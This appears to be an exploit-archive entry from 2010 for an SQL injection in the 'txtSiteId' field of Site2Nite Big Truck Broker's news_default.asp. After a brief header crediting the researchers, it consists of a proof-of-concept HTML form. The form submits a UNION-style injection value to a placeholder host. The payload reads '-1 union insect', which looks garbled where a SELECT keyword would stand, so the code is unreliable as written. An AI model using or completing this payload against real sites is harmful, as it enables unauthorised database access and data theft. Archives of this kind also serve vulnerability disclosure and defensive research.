id: 14993
date: 11/29/2010
title: Site2Nite Big Truck Broker "txtSiteId" SQL Injection Vulnerability
author: n/a
cves: 

==================================================================
Site2Nite Big Truck Broker "txtSiteId" SQL Injection Vulnerability
==================================================================

<!--
Site2Nite Big Truck Broker "txtSiteId" SQL Injection Vulnerability
PRODUCT: Site2Nite Big Truck Broker
PRODUCT URL: http://www.site2nite.com/productdetail.asp?id=14
RESEARCHERS: underground-stockholm.com
RESEARCHERS URL: http://underground-stockholm.com/
-->
<html>
<body>
<form method="post" action="http://[host]/[path]/news_default.asp">
<input type="text" name="txtSiteId" value="-1 union insect">
<input type="hidden" name="cmdSearchId" value="Go">
<input type="submit">
</form>
</body>
</html>



#  0day.today [2023-03-24]  #